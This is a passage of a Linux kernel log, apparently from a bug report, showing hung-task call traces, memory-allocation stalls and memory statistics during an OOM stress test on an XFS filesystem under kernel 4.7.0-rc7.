[xfs] [ 1201.155109] INFO: task oom-torture:4083 blocked for more than 120 seconds. [ 1201.160866] Not tainted 4.7.0-rc7+ #55 [ 1201.164425] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1201.170062] oom-torture D ffff88003aa47428 0 4083 3652 0x00000080 [ 1201.176947] ffff88003aa47428 ffff88003aa400c0 ffff88002bd3c100 ffff88003aa400c0 [ 1201.182405] ffff88003aa48000 ffff880037de7070 ffff88003aa400c0 ffff880035d00000 [ 1201.188232] 0000000000000000 ffff88003aa47440 ffffffff81621dea 7fffffffffffffff [ 1201.194181] Call Trace: [ 1201.196438] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.200074] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1201.204263] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1201.208399] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1201.213164] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1201.217851] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1201.221396] [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70 [ 1201.225927] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1201.229349] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.233532] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.237877] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.242283] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.247024] [<ffffffff810afc21>] ? enqueue_entity+0x1e1/0xba0 [ 1201.251190] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.255961] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.260139] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.264992] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.269857] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.274528] [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0 [ 1201.279040] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1201.284013] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1201.288578] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1201.292852] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1201.297644] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1201.302610] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1201.307028] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1201.311537] [<ffffffff81158326>] write_cache_pages+0x1f6/0x490 [ 1201.315770] [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs] [ 1201.322135] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.326382] [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs] [ 1201.330841] [<ffffffff811594ac>] do_writepages+0x1c/0x30 [ 1201.335292] [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100 [ 1201.339950] [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60 [ 1201.344676] [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs] [ 1201.349016] [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0 [ 1201.353378] [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90 [ 1201.357354] [<ffffffff811ff378>] do_fsync+0x38/0x60 [ 1201.360970] [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10 [ 1201.364887] [<ffffffff81003642>] do_syscall_64+0x62/0x190 [ 1201.368873] [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25 [ 1201.373458] 2 locks held by oom-torture/4083: [ 1201.377979] #0: (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0 [ 1201.384627] #1: (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs] [ 1201.392372] INFO: task oom-torture:4126 blocked for more than 120 seconds. [ 1201.397186] Not tainted 4.7.0-rc7+ #55 [ 1201.400361] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1201.405791] oom-torture D ffff880019c5f428 0 4126 3652 0x00000080 [ 1201.413798] ffff880019c5f428 ffff880019c58040 ffff88003fba4080 ffff880019c58040 [ 1201.419259] ffff880019c60000 ffff880037de7070 ffff880019c58040 ffff880035d00000 [ 1201.425238] 0000000000000000 ffff880019c5f440 ffffffff81621dea 7fffffffffffffff [ 1201.430688] Call Trace: [ 1201.432768] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.436438] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1201.440641] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1201.444792] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1201.449212] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1201.453883] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1201.457442] [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70 [ 1201.461940] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1201.465364] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.469653] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.474029] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.478766] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.483480] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.488382] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.492630] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.497546] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.502408] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.506862] [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0 [ 1201.511693] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1201.516961] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1201.522213] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1201.526631] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1201.531094] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1201.536384] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1201.540818] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1201.545350] [<ffffffff81158326>] write_cache_pages+0x1f6/0x490 [ 1201.549613] [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs] [ 1201.554525] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.558776] [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs] [ 1201.563217] [<ffffffff811594ac>] do_writepages+0x1c/0x30 [ 1201.567127] [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100 [ 1201.571792] [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60 [ 1201.576518] [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs] [ 1201.580860] [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0 [ 1201.584875] [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90 [ 1201.588849] [<ffffffff811ff378>] do_fsync+0x38/0x60 [ 1201.592486] [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10 [ 1201.596086] [<ffffffff81003642>] do_syscall_64+0x62/0x190 [ 1201.600028] [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25 [ 1201.604598] 2 locks held by oom-torture/4126: [ 1201.609179] #0: (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0 [ 1201.618523] #1: (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs] [ 1201.678895] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275 [ 1201.698443] MemAlloc: systemd(1) flags=0x400900 switches=158149 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=81975 uninterruptible [ 1201.735142] systemd D ffff88003faef5b8 0 1 0 0x00000000 [ 1201.743813] ffff88003faef5b8 00000001000dc1d3 ffff88002b3fc040 ffff88003fae8040 [ 1201.752998] ffff88003faf0000 ffff88003faef5f0 ffff88003d650300 00000001000dc1d3 [ 1201.761073] 0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d650300 [ 1201.766466] Call Trace: [ 1201.768534] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.772339] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1201.776623] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1201.780802] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1201.785651] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1201.790259] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1201.794385] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1201.798338] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1201.803098] [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c [ 1201.807690] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1201.811922] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1201.815748] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1201.820144] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1201.824254] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1201.829014] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.833220] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1201.837477] [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160 [ 1201.841758] [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370 [ 1201.846403] [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370 [ 1201.851167] [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260 [ 1201.855494] [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670 [ 1201.859509] [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs] [ 1201.863631] [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs] [ 1201.868073] [<ffffffff81176e71>] __do_fault+0x71/0x140 [ 1201.871866] [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30 [ 1201.876068] [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560 [ 1201.880291] [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560 [ 1201.884492] [<ffffffff8105c840>] __do_page_fault+0x190/0x560 [ 1201.888952] [<ffffffff8105cc40>] do_page_fault+0x30/0x80 [ 1201.893093] [<ffffffff81629278>] page_fault+0x28/0x30 [ 1201.896840] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible [ 1201.903736] kswapd0 D ffff880039fa7178 0 56 2 0x00000000 [ 1201.909494] ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100 [ 1201.915008] ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000 [ 1201.920524] 0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff [ 1201.925986] Call Trace: [ 1201.928112] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.931838] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1201.936074] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1201.940535] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1201.944987] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1201.949644] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1201.953149] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1201.956682] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.960832] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.965200] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.969536] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.973892] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.978644] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.982842] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.987335] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.992105] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.996447] [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0 [ 1202.000745] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1202.005547] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1202.010018] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1202.014194] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1202.018597] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1202.023493] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1202.028006] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1202.032475] [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs] [ 1202.036809] [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240 [ 1202.040867] [<ffffffff8115fa85>] shrink_page_list+0x725/0x950 [ 1202.045348] [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490 [ 1202.049708] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1202.053893] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1202.057714] [<ffffffff81162165>] kswapd+0x445/0x830 [ 1202.061317] [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0 [ 1202.066285] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1202.069865] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1202.074064] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 (...snipped...) [ 1208.254571] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=41309 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=90419 uninterruptible [ 1208.254573] kworker/2:1 D ffff88002d50b548 0 4484 2 0x00000080 [ 1208.254588] Workqueue: events_freezable_power_ disk_events_workfn [ 1208.254589] ffff88002d50b548 00000001000ddb5a ffff88003fb60080 ffff88002d5040c0 [ 1208.254591] ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001000ddb5a [ 1208.254592] 0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300 [ 1208.254592] Call Trace: [ 1208.254594] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1208.254595] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1208.254596] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1208.254597] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1208.254598] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1208.254600] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1208.254601] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1208.254602] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1208.254604] [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80 [ 1208.254605] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1208.254606] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1208.254607] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1208.254608] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1208.254609] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1208.254610] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1208.254613] [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0 [ 1208.254614] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1208.254617] [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0 [ 1208.254618] [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180 [ 1208.254619] [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130 [ 1208.272701] [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160 [ 1208.272734] [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0 [ 1208.272738] [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod] [ 1208.272742] [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom] [ 1208.272743] [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod] [ 1208.272747] [<ffffffff812bb6db>] disk_check_events+0x5b/0x150 [ 1208.272749] [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20 [ 1208.272752] [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400 [ 1208.272753] [<ffffffff8108e291>] ? process_one_work+0x141/0x400 [ 1208.272755] [<ffffffff8108e676>] worker_thread+0x126/0x490 [ 1208.272756] [<ffffffff8108e550>] ? process_one_work+0x400/0x400 [ 1208.272758] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1208.272761] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1208.272762] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 [ 1208.272858] Mem-Info: [ 1208.272864] active_anon:197951 inactive_anon:2919 isolated_anon:0 [ 1208.272864] active_file:497 inactive_file:551 isolated_file:23 [ 1208.272864] unevictable:0 dirty:0 writeback:204 unstable:0 [ 1208.272864] slab_reclaimable:1715 slab_unreclaimable:10861 [ 1208.272864] mapped:696 shmem:3239 pagetables:5438 bounce:0 [ 1208.272864] free:12363 free_pcp:219 free_cma:0 [ 1208.272869] Node 0 DMA free:4476kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:756kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1208.272870] lowmem_reserve[]: 0 936 936 936 [ 1208.272874] Node 0 DMA32 free:44976kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:1976kB inactive_file:2184kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:2772kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42688kB kernel_stack:20384kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:876kB local_pcp:104kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1208.272875] lowmem_reserve[]: 0 0 0 0 [ 1208.272883] Node 0 DMA: 37*4kB (U) 27*8kB (UM) 13*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4476kB [ 1208.272888] Node 0 DMA32: 1420*4kB (UME) 1010*8kB (UME) 661*16kB (UME) 323*32kB (UME) 117*64kB (UME) 22*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44976kB [ 1208.272890] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 1208.272892] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 1208.272893] 4329 total pagecache pages [ 1208.272894] 0 pages in swap cache [ 1208.272895] Swap cache stats: add 0, delete 0, find 0/0 [ 1208.272895] Free swap = 0kB [ 1208.272895] Total swap = 0kB [ 1208.272897] 262013 pages RAM [ 1208.272897] 0 pages HighMem/MovableOnly [ 1208.272898] 12770 pages reserved [ 1208.272898] 0 pages cma reserved [ 1208.272898] 0 pages hwpoisoned [ 1208.272899] Showing busy workqueues and worker pools: [ 1208.272972] workqueue events_power_efficient: flags=0x80 [ 1208.273012] pwq 0: cpus=0 node=0 flags=0x0 nice=0 active=1/256 [ 1208.273018] in-flight: 4340:fb_flashcursor [ 1208.273030] workqueue events_freezable_power_: flags=0x84 [ 1208.273058] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1208.273063] in-flight: 4484:disk_events_workfn [ 1208.273104] workqueue writeback: flags=0x4e [ 1208.273106] pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256 [ 1208.273111] in-flight: 73:wb_workfn wb_workfn [ 1208.306156] workqueue xfs-eofblocks/sda1: flags=0xc [ 1208.306191] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1208.306211] in-flight: 2125:xfs_eofblocks_worker [xfs] [ 1208.306229] pool 0: cpus=0 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 4426 2410 4325 4483 4437 4723 4326 2389 4721 4435 4720 2498 [ 1208.306236] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 1882 2396 2156 4427 2483 2293 4718 4646 2516 4722 4719 [ 1208.306302] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6 (...snipped...) [ 1208.311522] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275 (...snipped...) [ 1950.054919] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275 [ 1950.078012] MemAlloc: systemd(1) flags=0x400900 switches=165614 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=830398 uninterruptible [ 1950.111605] systemd R running task 0 1 0 0x00000000 [ 1950.122076] ffff88003faef5b8 0000000100192d5b ffff88003a544100 ffff88003fae8040 [ 1950.128056] ffff88003faf0000 ffff88003faef5f0 ffff88003d6d0300 0000000100192d5b [ 1950.133668] 0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d6d0300 [ 1950.139115] Call Trace: [ 1950.141436] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1950.145228] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1950.149574] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1950.153772] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1950.158432] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1950.162841] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1950.166950] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1950.170994] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1950.175841] [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c [ 1950.180556] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1950.185904] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1950.190358] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1950.194978] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1950.201233] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1950.206097] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1950.210494] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1950.215278] [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160 [ 1950.219628] [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370 [ 1950.224302] [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370 [ 1950.229148] [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260 [ 1950.233503] [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670 [ 1950.237520] [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs] [ 1950.241643] [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs] [ 1950.246027] [<ffffffff81176e71>] __do_fault+0x71/0x140 [ 1950.249784] [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30 [ 1950.253974] [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560 [ 1950.259159] [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560 [ 1950.264641] [<ffffffff8105c840>] __do_page_fault+0x190/0x560 [ 1950.269192] [<ffffffff8105cc40>] do_page_fault+0x30/0x80 [ 1950.273736] [<ffffffff81629278>] page_fault+0x28/0x30 [ 1950.278475] MemAlloc: khugepaged(47) flags=0x200840 switches=8965 seq=9 gfp=0xc752ca(GFP_TRANSHUGE|__GFP_THISNODE|__GFP_DIRECT_RECLAIM|__GFP_OTHER_NODE) order=9 delay=762178 uninterruptible [ 1950.291797] khugepaged D ffff88003cf537a8 0 47 2 0x00000000 [ 1950.298253] ffff88003cf537a8 0000000100192dbf ffff88003fae8040 ffff88003cf3c000 [ 1950.304204] ffff88003cf54000 ffff88003cf537e0 ffff88003d6d0300 0000000100192dbf [ 1950.310046] 0000000000000002 ffff88003cf537c0 ffffffff81621dea ffff88003d6d0300 [ 1950.317795] Call Trace: [ 1950.320089] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1950.324003] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1950.328400] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1950.332449] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1950.337038] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1950.341332] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1950.345834] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1950.351326] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1950.355756] [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80 [ 1950.360660] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1950.366724] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1950.370594] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1950.374968] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1950.379637] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1950.384061] [<ffffffff810ba578>] ? remove_wait_queue+0x48/0x50 [ 1950.388185] [<ffffffff811af13e>] khugepaged+0x80e/0x1510 [ 1950.392291] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1950.396425] [<ffffffff811ae930>] ? vmf_insert_pfn_pmd+0x1b0/0x1b0 [ 1950.400908] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1950.404637] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1950.408407] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 [ 1950.412879] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible [ 1950.419403] kswapd0 D ffff880039fa7178 0 56 2 0x00000000 [ 1950.424425] ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100 [ 1950.430782] ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000 [ 1950.436007] 0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff [ 1950.441198] Call Trace: [ 1950.443203] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1950.447880] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1950.452830] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1950.456988] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1950.461570] [<ffffffff810c0ef9>] ? 